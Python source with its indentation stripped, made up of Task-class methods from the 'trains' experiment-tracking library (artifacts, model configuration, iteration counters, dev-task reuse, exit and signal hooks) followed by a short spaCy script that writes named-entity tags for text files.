# type: (str, Union[str, Mapping, "pandas.DataFrame", "numpy.ndarray", "PIL.Image.Image"], Optional[Mapping], bool) -> bool
"""
Add static artifact to Task. Artifact file/object will be uploaded in the background
:raises ValueError: if artifact_object is not supported
:param str name: Artifact name. Notice! it will override previous artifact if name already exists
:param object artifact_object: Artifact object to upload. Currently supports:
- string / pathlib2.Path are treated as path to artifact file to upload
If wildcard or a folder is passed, zip file containing the local files will be created and uploaded
- dict will be stored as .json file and uploaded
- pandas.DataFrame will be stored as .csv.gz (compressed CSV file) and uploaded
- numpy.ndarray will be stored as .npz and uploaded
- PIL.Image will be stored to .png file and uploaded
:param dict metadata: Simple key/value dictionary to store on the artifact
:param bool delete_after_upload: If True local artifact will be deleted
(only applies if artifact_object is a local file)
:return: True if artifact will be uploaded
"""
return self._artifacts_manager.upload_artifact(name=name, artifact_object=artifact_object,
metadata=metadata, delete_after_upload=delete_after_upload)
def get_models(self):
# type: () -> Dict[str, List[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks are for example: TensorFlow, Keras, PyTorch, ScikitLearn(joblib) etc.
:return dict: dict with keys input/output, each is list of Model objects.
Example: {'input': [trains.Model()], 'output': [trains.Model()]}
"""
task_models = {'input': self._get_models(model_type='input'),
'output': self._get_models(model_type='output')}
return task_models
def is_current_task(self):
# type: () -> bool
"""
Check if this task is the main task (returned by Task.init())
.. deprecated:: 0.1.0
Use :func:`is_main_task()` instead
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the main task
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Check if this task is the main task (created/returned by Task.init())
If Task.init() was never called, this method will *not* create
it, making this test cheaper than Task.init() == task
:return: True if this task is the main task
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :func:`connect_configuration` instead
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set Task output label enumeration (before creating an output model)
When an output model is created it will inherit these properties
:param enumeration: dictionary of string to integer, enumerating the model output to labels
example: {'background': 0 , 'person': 1}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Return the maximum reported iteration (i.e. the maximum iteration the task reported a metric for)
Notice, this is not a cached call, it will ask the backend for the answer (no local caching)
:return: last reported iteration number (integer)
"""
self._reload_last_iteration()
return max(self.data.last_iteration, self._reporter.max_iteration if self._reporter else 0)
def set_last_iteration(self, last_iteration):
# type: (int) -> None
"""
Forcefully set the last reported iteration
(i.e. the maximum iteration the task reported a metric for)
:param last_iteration: last reported iteration number
:type last_iteration: integer
"""
self.data.last_iteration = int(last_iteration)
self._edit(last_iteration=self.data.last_iteration)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: newly set initial offset
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return int: initial iteration offset
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Extract the last scalar metrics, ordered by title and series in a nested dictionary
:return: dict. Example: {'title': {'series': {'last': 0.5, 'min': 0.1, 'max': 0.9}}}
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get task parameters as a raw nested dict
.. note::
values are not parsed and returned as is (i.e. string)
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set task parameters from a (possibly nested) dict
While parameters are set just as they would be in connect(dict), this does not link the dict to the task,
but rather performs a one-time update.
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
@classmethod
def set_credentials(cls, api_host=None, web_host=None, files_host=None, key=None, secret=None, host=None):
# type: (Optional[str], Optional[str], Optional[str], Optional[str], Optional[str], Optional[str]) -> ()
"""
Set new default trains-server host values and credentials
These configurations will be overridden by either OS environment variables or trains.conf configuration file
.. note::
credentials need to be set *prior* to Task initialization
:param str api_host: Trains API server url, example: host='http://localhost:8008'
:param str web_host: Trains WEB server url, example: host='http://localhost:8080'
:param str files_host: Trains Files server url, example: host='http://localhost:8081'
:param str key: user key/secret pair, example: key='thisisakey123'
:param str secret: user key/secret pair, example: secret='thisisseceret123'
:param str host: host url (overrides api_host), example: host='http://localhost:8008'
"""
if api_host:
Session.default_host = api_host
if web_host:
Session.default_web = web_host
if files_host:
Session.default_files = files_host
if key:
Session.default_key = key
if not running_remotely():
ENV_ACCESS_KEY.set(key)
if secret:
Session.default_secret = secret
if not running_remotely():
ENV_SECRET_KEY.set(secret)
if host:
Session.default_host = host
Session.default_web = web_host or ''
Session.default_files = files_host or ''
def _set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
Set Task model configuration text/dict
:param config_text: model configuration (unconstrained text string). usually the content of a configuration file.
If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
design = OutputModel._resolve_config(config_text=config_text, config_dict=config_dict)
super(Task, self)._set_model_design(design=design)
def _get_model_config_text(self):
# type: () -> str
"""
Get Task model configuration text (before creating an output model)
When an output model is created it will inherit these properties
:return: model config_text (unconstrained text string)
"""
return super(Task, self).get_model_design()
def _get_model_config_dict(self):
# type: () -> Dict
"""
Get Task model configuration dictionary (before creating an output model)
When an output model is created it will inherit these properties
:return: config_dict: model configuration parameters dictionary
"""
config_text = self._get_model_config_text()
return OutputModel._text_to_config_dict(config_text)
@classmethod
def _reset_current_task_obj(cls):
if not cls.__main_task:
return
task = cls.__main_task
cls.__main_task = None
if task._dev_worker:
task._dev_worker.unregister()
task._dev_worker = None
@classmethod
def _create_dev_task(cls, default_project_name, default_task_name, default_task_type, reuse_last_task_id,
detect_repo=True):
if not default_project_name or not default_task_name:
# get project name and task name from repository name and entry_point
result, _ = ScriptInfo.get(create_requirements=False, check_uncommitted=False)
if not default_project_name:
# noinspection PyBroadException
try:
parts = result.script['repository'].split('/')
default_project_name = (parts[-1] or parts[-2]).replace('.git', '') or 'Untitled'
except Exception:
default_project_name = 'Untitled'
if not default_task_name:
# noinspection PyBroadException
try:
default_task_name = os.path.splitext(os.path.basename(result.script['entry_point']))[0]
except Exception:
pass
# if we force no task reuse from os environment
if DEV_TASK_NO_REUSE.get() or not reuse_last_task_id:
default_task = None
else:
# if we have a previous session to use, get the task id from it
default_task = cls.__get_last_used_task_id(
default_project_name,
default_task_name,
default_task_type.value,
)
closed_old_task = False
default_task_id = None
in_dev_mode = not running_remotely()
if in_dev_mode:
if isinstance(reuse_last_task_id, str) and reuse_last_task_id:
default_task_id = reuse_last_task_id
elif not reuse_last_task_id or not cls.__task_is_relevant(default_task):
default_task_id = None
else:
default_task_id = default_task.get('id') if default_task else None
if default_task_id:
try:
task = cls(
private=cls.__create_protection,
task_id=default_task_id,
log_to_backend=True,
)
task_tags = task.data.system_tags if hasattr(task.data, 'system_tags') else task.data.tags
task_artifacts = task.data.execution.artifacts \
if hasattr(task.data.execution, 'artifacts') else None
if ((str(task.status) in (str(tasks.TaskStatusEnum.published), str(tasks.TaskStatusEnum.closed)))
or task.output_model_id or (ARCHIVED_TAG in task_tags)
or (cls._development_tag not in task_tags)
or task_artifacts):
# If the task is published or closed, we shouldn't reset it so we can't use it in dev mode
# If the task is archived, or already has an output model,
# we shouldn't use it in development mode either
default_task_id = None
task = None
else:
# reset the task, so we can update it
task.reset(set_started_on_success=False, force=False)
# set development tags
task.set_system_tags([cls._development_tag])
# clear task parameters, they are not cleared by the Task reset
task.set_parameters({}, __update=False)
# clear the comment, it is not cleared on reset
task.set_comment(make_message('Auto-generated at %(time)s by %(user)s@%(host)s'))
# clear the input model (and task model design/labels)
task.set_input_model(model_id='', update_task_design=False, update_task_labels=False)
task._set_model_config(config_text='')
task.set_model_label_enumeration({})
task.set_artifacts([])
task._set_storage_uri(None)
except (Exception, ValueError):
# we failed reusing task, create a new one
default_task_id = None
# create a new task
if not default_task_id:
task = cls(
private=cls.__create_protection,
project_name=default_project_name,
task_name=default_task_name,
task_type=default_task_type,
log_to_backend=True,
)
if in_dev_mode:
# update this session, for later use
cls.__update_last_used_task_id(default_project_name, default_task_name, default_task_type.value, task.id)
# set default docker image from env.
task._set_default_docker_image()
# mark the task as started
task.started()
# force update of base logger to this current task (this is the main logger task)
task._setup_log(replace_existing=True)
logger = task.get_logger()
if closed_old_task:
logger.report_text('TRAINS Task: Closing old development task id={}'.format(default_task.get('id')))
# print warning, reusing/creating a task
if default_task_id:
logger.report_text('TRAINS Task: overwriting (reusing) task id=%s' % task.id)
else:
logger.report_text('TRAINS Task: created new task id=%s' % task.id)
# update current repository and put warning into logs
if detect_repo:
if in_dev_mode and cls.__detect_repo_async:
task._detect_repo_async_thread = threading.Thread(target=task._update_repository)
task._detect_repo_async_thread.daemon = True
task._detect_repo_async_thread.start()
else:
task._update_repository()
# make sure everything is in sync
task.reload()
# make sure we see something in the UI
thread = threading.Thread(target=LoggerRoot.flush)
thread.daemon = True
thread.start()
return task
def _get_logger(self, flush_period=NotSet):
# type: (Optional[float]) -> Logger
"""
get a logger object for reporting based on the task
:param flush_period: The period of the logger flush.
If None of any other False value, will not flush periodically.
If a logger was created before, this will be the new period and
the old one will be discarded.
:return: Logger object
"""
pass
if not self._logger:
# force update of base logger to this current task (this is the main logger task)
self._setup_log(replace_existing=self.is_main_task())
# Get a logger object
self._logger = Logger(private_task=self)
# make sure we set our reported to async mode
# we make sure we flush it in self._at_exit
self.reporter.async_enable = True
# if we just created the logger, set default flush period
if not flush_period or flush_period is self.NotSet:
flush_period = DevWorker.report_period
if isinstance(flush_period, (int, float)):
flush_period = int(abs(flush_period))
if flush_period is None or isinstance(flush_period, int):
self._logger.set_flush_period(flush_period)
return self._logger
def _connect_output_model(self, model):
assert isinstance(model, OutputModel)
model.connect(self)
return model
def _save_output_model(self, model):
"""
Save a reference to the connected output model.
:param model: The connected output model
"""
self._connected_output_model = model
def _reconnect_output_model(self):
"""
If there is a saved connected output model, connect it again.
This is needed if the input model is connected after the output model
is connected, an then we will have to get the model design from the
input model by reconnecting.
"""
if self._connected_output_model:
self.connect(self._connected_output_model)
def _connect_input_model(self, model):
assert isinstance(model, InputModel)
# we only allow for an input model to be connected once
# at least until we support multiple input models
# notice that we do not check the task's input model because we allow task reuse and overwrite
# add into comment that we are using this model
comment = self.comment or ''
if not comment.endswith('\n'):
comment += '\n'
comment += 'Using model id: {}'.format(model.id)
self.set_comment(comment)
if self._last_input_model_id and self._last_input_model_id != model.id:
self.log.info('Task connect, second input model is not supported, adding into comment section')
return
self._last_input_model_id = model.id
model.connect(self)
return model
def _try_set_connected_parameter_type(self, option):
# """ Raise an error if current value is not None and not equal to the provided option value """
# value = self._connected_parameter_type
# if not value or value == option:
# self._connected_parameter_type = option
# return option
#
# def title(option):
# return " ".join(map(str.capitalize, option.split("_")))
#
# raise ValueError(
# "Task already connected to {}. "
# "Task can be connected to only one the following argument options: {}".format(
# title(value),
# ' / '.join(map(title, self._ConnectedParametersType._options())))
# )
# added support for multiple type connections through _Arguments
return option
def _connect_argparse(self, parser, args=None, namespace=None, parsed_args=None):
# do not allow argparser to connect to jupyter notebook
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
from IPython import get_ipython
ip = get_ipython()
if ip is not None and 'IPKernelApp' in ip.config:
return parser
except Exception:
pass
self._try_set_connected_parameter_type(self._ConnectedParametersType.argparse)
if self.is_main_task():
argparser_update_currenttask(self)
if (parser is None or parsed_args is None) and argparser_parseargs_called():
_parser, _parsed_args = get_argparser_last_args()
if parser is None:
parser = _parser
if parsed_args is None and parser == _parser:
parsed_args = _parsed_args
if running_remotely() and self.is_main_task():
self._arguments.copy_to_parser(parser, parsed_args)
else:
self._arguments.copy_defaults_from_argparse(parser, args=args, namespace=namespace, parsed_args=parsed_args)
return parser
def _connect_dictionary(self, dictionary):
def _update_args_dict(task, config_dict):
task._arguments.copy_from_dict(flatten_dictionary(config_dict))
def _refresh_args_dict(task, config_dict):
# reread from task including newly added keys
flat_dict = task._arguments.copy_to_dict(flatten_dictionary(config_dict))
nested_dict = config_dict._to_dict()
config_dict.clear()
config_dict.update(nested_from_flat_dictionary(nested_dict, flat_dict))
self._try_set_connected_parameter_type(self._ConnectedParametersType.dictionary)
if not running_remotely() or not self.is_main_task():
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
dictionary = ProxyDictPostWrite(self, _update_args_dict, **dictionary)
else:
flat_dict = flatten_dictionary(dictionary)
flat_dict = self._arguments.copy_to_dict(flat_dict)
dictionary = nested_from_flat_dictionary(dictionary, flat_dict)
dictionary = ProxyDictPostWrite(self, _refresh_args_dict, **dictionary)
return dictionary
def _connect_task_parameters(self, attr_class):
self._try_set_connected_parameter_type(self._ConnectedParametersType.task_parameters)
if running_remotely() and self.is_main_task():
attr_class.update_from_dict(self.get_parameters())
else:
self.set_parameters(attr_class.to_dict())
return attr_class
def _validate(self, check_output_dest_credentials=False):
if running_remotely():
super(Task, self)._validate(check_output_dest_credentials=False)
def _output_model_updated(self):
""" Called when a connected output model is updated """
if running_remotely() or not self.is_main_task():
return
# Make sure we know we've started, just in case we didn't so far
self._dev_mode_task_start(model_updated=True)
def _dev_mode_task_start(self, model_updated=False):
""" Called when we suspect the task has started running """
self._dev_mode_setup_worker(model_updated=model_updated)
def _dev_mode_stop_task(self, stop_reason):
# make sure we do not get called (by a daemon thread) after at_exit
if self._at_exit_called:
return
self.log.warning(
"### TASK STOPPED - USER ABORTED - {} ###".format(
stop_reason.upper().replace('_', ' ')
)
)
self.flush(wait_for_uploads=True)
self.stopped()
if self._dev_worker:
self._dev_worker.unregister()
# NOTICE! This will end the entire execution tree!
if self.__exit_hook:
self.__exit_hook.remote_user_aborted = True
self._kill_all_child_processes(send_kill=False)
time.sleep(2.0)
self._kill_all_child_processes(send_kill=True)
# noinspection PyProtectedMember
os._exit(1)
@staticmethod
def _kill_all_child_processes(send_kill=False):
# get current process if pid not provided
include_parent = True
pid = os.getpid()
try:
parent = psutil.Process(pid)
except psutil.Error:
# could not find parent process id
return
for child in parent.children(recursive=True):
if send_kill:
child.kill()
else:
child.terminate()
# kill ourselves
if send_kill:
parent.kill()
else:
parent.terminate()
def _dev_mode_setup_worker(self, model_updated=False):
if running_remotely() or not self.is_main_task():
return
if self._dev_worker:
return self._dev_worker
self._dev_worker = DevWorker()
self._dev_worker.register(self)
logger = self.get_logger()
flush_period = logger.get_flush_period()
if not flush_period or flush_period > self._dev_worker.report_period:
logger.set_flush_period(self._dev_worker.report_period)
def _wait_for_repo_detection(self, timeout=None):
# wait for detection repo sync
if self._detect_repo_async_thread:
with self._repo_detect_lock:
if self._detect_repo_async_thread:
try:
if self._detect_repo_async_thread.is_alive():
self.log.info('Waiting for repository detection and full package requirement analysis')
self._detect_repo_async_thread.join(timeout=timeout)
# because join has no return value
if self._detect_repo_async_thread.is_alive():
self.log.info('Repository and package analysis timed out ({} sec), '
'giving up'.format(timeout))
else:
self.log.info('Finished repository detection and package analysis')
self._detect_repo_async_thread = None
except Exception:
pass
def _summary_artifacts(self):
# signal artifacts upload, and stop daemon
self._artifacts_manager.stop(wait=True)
# print artifacts summary (if not empty)
if self._artifacts_manager.summary:
self.get_logger().report_text(self._artifacts_manager.summary)
def _at_exit(self):
"""
Will happen automatically once we exit code, i.e. atexit
:return:
"""
# protect sub-process at_exit
if self._at_exit_called:
return
is_sub_process = self.__is_subprocess()
# noinspection PyBroadException
try:
# from here do not get into watch dog
self._at_exit_called = True
wait_for_uploads = True
# first thing mark task as stopped, so we will not end up with "running" on lost tasks
# if we are running remotely, the daemon will take care of it
task_status = None
if not running_remotely() and self.is_main_task() and not is_sub_process:
# check if we crashed, ot the signal is not interrupt (manual break)
task_status = ('stopped', )
if self.__exit_hook:
if (self.__exit_hook.exception and not isinstance(self.__exit_hook.exception, KeyboardInterrupt)) \
or (not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal not in (None, 2)):
task_status = ('failed', 'Exception')
wait_for_uploads = False
else:
wait_for_uploads = (self.__exit_hook.remote_user_aborted or self.__exit_hook.signal is None)
if not self.__exit_hook.remote_user_aborted and self.__exit_hook.signal is None and \
not self.__exit_hook.exception:
task_status = ('completed', )
else:
task_status = ('stopped', )
# wait for repository detection (if we didn't crash)
if wait_for_uploads and self._logger:
# we should print summary here
self._summary_artifacts()
# make sure that if we crashed the thread we are not waiting forever
if not is_sub_process:
self._wait_for_repo_detection(timeout=10.)
# wait for uploads
print_done_waiting = False
if wait_for_uploads and (BackendModel.get_num_results() > 0 or
(self._reporter and self.reporter.get_num_results() > 0)):
self.log.info('Waiting to finish uploads')
print_done_waiting = True
# from here, do not send log in background thread
if wait_for_uploads:
self.flush(wait_for_uploads=True)
# wait until the reporter flush everything
if self._reporter:
self.reporter.stop()
if self.is_main_task():
# notice: this will close the reporting for all the Tasks in the system
Metrics.close_async_threads()
# notice: this will close the jupyter monitoring
ScriptInfo.close()
if self.is_main_task():
try:
from .storage.helper import StorageHelper
StorageHelper.close_async_threads()
except:
pass
if print_done_waiting:
self.log.info('Finished uploading')
elif self._logger:
self._logger._flush_stdout_handler()
# from here, do not check worker status
if self._dev_worker:
self._dev_worker.unregister()
if not is_sub_process:
# change task status
if not task_status:
pass
elif task_status[0] == 'failed':
self.mark_failed(status_reason=task_status[1])
elif task_status[0] == 'completed':
self.completed()
elif task_status[0] == 'stopped':
self.stopped()
# stop resource monitoring
if self._resource_monitor:
self._resource_monitor.stop()
if self._logger:
self._logger.set_flush_period(None)
# this is so in theory we can close a main task and start a new one
if self.is_main_task():
Task.__main_task = None
except Exception:
# make sure we do not interrupt the exit process
pass
# delete locking object (lock file)
# noinspection PyBroadException
if self._edit_lock:
try:
del self._edit_lock
except Exception:
pass
self._edit_lock = None
@classmethod
def __register_at_exit(cls, exit_callback, only_remove_signal_and_exception_hooks=False):
class ExitHooks(object):
_orig_exit = None
_orig_exc_handler = None
remote_user_aborted = False
def __init__(self, callback):
self.exit_code = None
self.exception = None
self.signal = None
self._exit_callback = callback
self._org_handlers = {}
self._signal_recursion_protection_flag = False
self._except_recursion_protection_flag = False
def update_callback(self, callback):
if self._exit_callback and not six.PY2:
try:
atexit.unregister(self._exit_callback)
except Exception:
pass
self._exit_callback = callback
if callback:
self.hook()
else:
# un register int hook
if self._orig_exc_handler:
sys.excepthook = self._orig_exc_handler
self._orig_exc_handler = None
for s in self._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, self._org_handlers[s])
except Exception:
pass
self._org_handlers = {}
def hook(self):
if self._orig_exit is None:
self._orig_exit = sys.exit
sys.exit = self.exit
if self._orig_exc_handler is None:
self._orig_exc_handler = sys.excepthook
sys.excepthook = self.exc_handler
if self._exit_callback:
atexit.register(self._exit_callback)
if not self._org_handlers and not Task._Task__is_subprocess():
if sys.platform == 'win32':
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE]
else:
catch_signals = [signal.SIGINT, signal.SIGTERM, signal.SIGSEGV, signal.SIGABRT,
signal.SIGILL, signal.SIGFPE, signal.SIGQUIT]
for s in catch_signals:
# noinspection PyBroadException
try:
self._org_handlers[s] = signal.getsignal(s)
signal.signal(s, self.signal_handler)
except Exception:
pass
def exit(self, code=0):
self.exit_code = code
self._orig_exit(code)
def exc_handler(self, exctype, value, traceback, *args, **kwargs):
if self._except_recursion_protection_flag:
return sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = True
self.exception = value
if self._orig_exc_handler:
ret = self._orig_exc_handler(exctype, value, traceback, *args, **kwargs)
else:
ret = sys.__excepthook__(exctype, value, traceback, *args, **kwargs)
self._except_recursion_protection_flag = False
return ret
def signal_handler(self, sig, frame):
if self._signal_recursion_protection_flag:
# call original
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
org_handler = org_handler(sig, frame)
return org_handler
self._signal_recursion_protection_flag = True
# call exit callback
self.signal = sig
if self._exit_callback:
# noinspection PyBroadException
try:
self._exit_callback()
except Exception:
pass
# call original signal handler
org_handler = self._org_handlers.get(sig)
if isinstance(org_handler, Callable):
# noinspection PyBroadException
try:
org_handler = org_handler(sig, frame)
except Exception:
org_handler = signal.SIG_DFL
# remove stdout logger, just in case
# noinspection PyBroadException
try:
Logger._remove_std_logger()
except Exception:
pass
self._signal_recursion_protection_flag = False
# return handler result
return org_handler
# we only remove the signals since this will hang subprocesses
if only_remove_signal_and_exception_hooks:
if not cls.__exit_hook:
return
if cls.__exit_hook._orig_exc_handler:
sys.excepthook = cls.__exit_hook._orig_exc_handler
cls.__exit_hook._orig_exc_handler = None
for s in cls.__exit_hook._org_handlers:
# noinspection PyBroadException
try:
signal.signal(s, cls.__exit_hook._org_handlers[s])
except Exception:
pass
cls.__exit_hook._org_handlers = {}
return
if cls.__exit_hook is None:
# noinspection PyBroadException
try:
cls.__exit_hook = ExitHooks(exit_callback)
cls.__exit_hook.hook()
except Exception:
cls.__exit_hook = None
else:
cls.__exit_hook.update_callback(exit_callback)
@classmethod
def __get_task(cls, task_id=None, project_name=None, task_name=None):
if task_id:
return cls(private=cls.__create_protection, task_id=task_id, log_to_backend=False)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
project=[project.id],
name=exact_match_regex(task_name) if task_name else None,
only_fields=['id', 'name', 'last_update', system_tags]
)
)
res_tasks = res.response.tasks
# if we have more than one result, first filter 'archived' results:
if len(res_tasks) > 1:
filtered_tasks = [t for t in res_tasks if not getattr(t, system_tags, None) or
'archived' not in getattr(t, system_tags, None)]
if filtered_tasks:
res_tasks = filtered_tasks
task = get_single_result(entity='task', query=task_name, results=res_tasks, raise_on_error=False)
if not task:
return None
return cls(
private=cls.__create_protection,
task_id=task.id,
log_to_backend=False,
)
@classmethod
def __get_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if task_ids:
if isinstance(task_ids, six.string_types):
task_ids = [task_ids]
return [
cls(private=cls.__create_protection, task_id=task, log_to_backend=False)
for task in task_ids
]
return cls._query_tasks(
project_name=project_name,
task_name=task_name,
**kwargs
)
@classmethod
def _query_tasks(cls, task_ids=None, project_name=None, task_name=None, **kwargs):
if not task_ids:
task_ids = None
elif isinstance(task_ids, six.string_types):
task_ids = [task_ids]
if project_name:
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(
name=exact_match_regex(project_name)
)
)
project = get_single_result(entity='project', query=project_name, results=res.response.projects)
else:
project = None
system_tags = 'system_tags' if hasattr(tasks.Task, 'system_tags') else 'tags'
only_fields = ['id', 'name', 'last_update', system_tags]
if kwargs and kwargs.get('only_fields'):
only_fields = list(set(kwargs.pop('only_fields')) | set(only_fields))
res = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(
id=task_ids,
project=[project.id] if project else None,
name=task_name if task_name else None,
only_fields=only_fields,
**kwargs
)
)
return res.response.tasks
@classmethod
def __get_hash_key(cls, *args):
def normalize(x):
return "<{}>".format(x) if x is not None else ""
return ":".join(map(normalize, args))
@classmethod
def __get_last_used_task_id(cls, default_project_name, default_task_name, default_task_type):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
# check if we have a cached task_id we can reuse
# it must be from within the last 24h and with the same project/name/type
task_sessions = SessionCache.load_dict(str(cls))
task_data = task_sessions.get(hash_key)
if task_data is None:
return None
try:
task_data['type'] = cls.TaskTypes(task_data['type'])
except (ValueError, KeyError):
LoggerRoot.get_base_logger().warning(
"Corrupted session cache entry: {}. "
"Unsupported task type: {}"
"Creating a new task.".format(hash_key, task_data['type']),
)
return None
return task_data
@classmethod
def __update_last_used_task_id(cls, default_project_name, default_task_name, default_task_type, task_id):
hash_key = cls.__get_hash_key(cls._get_api_server(), default_project_name, default_task_name, default_task_type)
task_id = str(task_id)
# update task session cache
task_sessions = SessionCache.load_dict(str(cls))
last_task_session = {'time': time.time(), 'project': default_project_name, 'name': default_task_name,
'type': default_task_type, 'id': task_id}
# remove stale sessions
for k in list(task_sessions.keys()):
if ((time.time() - task_sessions[k].get('time', 0)) >
60 * 60 * cls.__task_id_reuse_time_window_in_hours):
task_sessions.pop(k)
# update current session
task_sessions[hash_key] = last_task_session
# store
SessionCache.store_dict(str(cls), task_sessions)
@classmethod
def __task_timed_out(cls, task_data):
return \
task_data and \
task_data.get('id') and \
task_data.get('time') and \
(time.time() - task_data.get('time')) > (60 * 60 * cls.__task_id_reuse_time_window_in_hours)
@classmethod
def __get_task_api_obj(cls, task_id, only_fields=None):
if not task_id:
return None
all_tasks = cls._send(
cls._get_default_session(),
tasks.GetAllRequest(id=[task_id], only_fields=only_fields),
).response.tasks
# The task may not exist in environment changes
if not all_tasks:
return None
return all_tasks[0]
@classmethod
def __task_is_relevant(cls, task_data):
"""
Check that a cached task is relevant for reuse.
A task is relevant for reuse if:
1. It is not timed out i.e it was last use in the previous 24 hours.
2. It's name, project and type match the data in the server, so not
to override user changes made by using the UI.
:param task_data: A mapping from 'id', 'name', 'project', 'type' keys
to the task's values, as saved in the cache.
:return: True if the task is relevant for reuse, False if not.
"""
if not task_data:
return False
if cls.__task_timed_out(task_data):
return False
task_id = task_data.get('id')
if not task_id:
return False
task = cls.__get_task_api_obj(task_id, ('id', 'name', 'project', 'type'))
if task is None:
return False
project_name = None
if task.project:
project = cls._send(
cls._get_default_session(),
projects.GetByIdRequest(project=task.project)
).response.project
if project:
project_name = project.name
compares = (
(task.name, 'name'),
(project_name, 'project'),
(task.type, 'type'),
)
# compare after casting to string to avoid enum instance issues
# remember we might have replaced the api version by now, so enums are different
return all(six.text_type(server_data) == six.text_type(task_data.get(task_data_key))
for server_data, task_data_key in compares)
@classmethod
def __close_timed_out_task(cls, task_data):
if not task_data:
return False
task = cls.__get_task_api_obj(task_data.get('id'), ('id', 'status'))
if task is None:
return False
stopped_statuses = (
str(tasks.TaskStatusEnum.stopped),
str(tasks.TaskStatusEnum.published),
str(tasks.TaskStatusEnum.publishing),
str(tasks.TaskStatusEnum.closed),
str(tasks.TaskStatusEnum.failed),
str(tasks.TaskStatusEnum.completed),
)
if str(task.status) not in stopped_statuses:
cls._send(
cls._get_default_session(),
tasks.StoppedRequest(
task=task.id,
force=True,
status_message="Stopped timed out development task"
),
)
return True
return False
|
ner_with_spacy.py
|
import spacy
import sys
from os import listdir, system
from os.path import isfile, join
from multiprocessing import Process
from math import ceil
import subprocess
indir_path = sys.argv[1]
outdir_path = sys.argv[2]
nthreads = int(sys.argv[3])
def process(filenames, tid):
nlp = spacy.load('en')
for fname in filenames:
in_path = fname
out_path = outdir_path + '/' + fname.split('/')[-1] + '.ner'
print('tagging', fname, 'and write to', out_path)
cmd = r"""awk '{if (NF > 2) printf("%s ", $2); else printf("\n")}' """ + fname + r' > /tmp/spacy' + str(tid)
print(cmd)
system(cmd)
ner(nlp, '/tmp/spacy' + str(tid), out_path)
print('done', fname)
def ner(nlp, in_path, out_path):
with open(out_path, 'w') as fout:
with open(in_path, 'r') as fin:
count = 0
for line in fin:
line = line.strip().replace('-LRB-', '(').replace('-RRB-', ')')
if line.startswith('- DOC'):
fout.write(line.replace('- DOCSTART', '-DOCSTART- (') + ')\n')
continue
doc = nlp(line)
start = 0
string = str(doc)
for ent in doc.ents:
if ent.label_ not in {'PERSON', 'NORP', 'FACILITY', 'ORG', 'GPE', 'LOC', 'PRODUCT', 'WORK_OF_ART', 'EVENT', 'LAW', 'LANGUAGE'}:
continue
output = string[start:ent.start_char].strip()
if len(output) > 0:
fout.write(output.replace(' ', '\n') + '\n')
ent_name = string[ent.start_char:ent.end_char].strip()
toks = ent_name.split()
if len(toks) == 0:
continue
if toks[0] == 'the' or toks[0] == 'The':
fout.write(toks[0] + '\n')
toks = toks[1:]
if len(toks) == 0:
continue
print_s = False
if toks[-1] == "'s":
print_s = True
toks = toks[:-1]
ent_name = ' '.join(toks)
if len(ent_name) == 0:
continue
# print(ent, ent.label_, ent.start_char, ent.end_char)
fout.write(toks[0] + '\tB\t' + ent_name + '\tUNK\tUNK\tUNK\tUNK\n')
for i in range(1,len(toks)):
fout.write(toks[i] + '\tI\t' + ent_name + '\tUNK\tUNK\tUNK\tUNK\n')
if print_s:
fout.write("'s\n")
start = ent.end_char
output = string[start:].strip()
if len(output) > 0:
fout.write(output.replace(' ', '\n') + '\n')
fout.write('\n')
# count += 1
# if count % 100 == 0:
# print(count, end='\r')
# if count > 1000:
# break
